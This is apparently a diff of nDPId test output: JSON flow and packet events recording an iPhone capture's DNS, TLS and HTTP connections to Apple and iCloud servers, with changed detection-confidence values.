+00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454598412,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"mesu.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.105.202"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1582454598413,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598413,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/3DAqAIRX2UZNcWQAbugppiojD2gk4AQBAvpMwAAAQEIChHf524i0ASh"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454598542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598542,"pkt":"xiwDYGpkxGGLNYKpCABFAABAIN8AAP8RFWvAqAIRwKgCAc50ADUALLvssQ8BAAABAAAAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQAB"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"} -00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} +00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 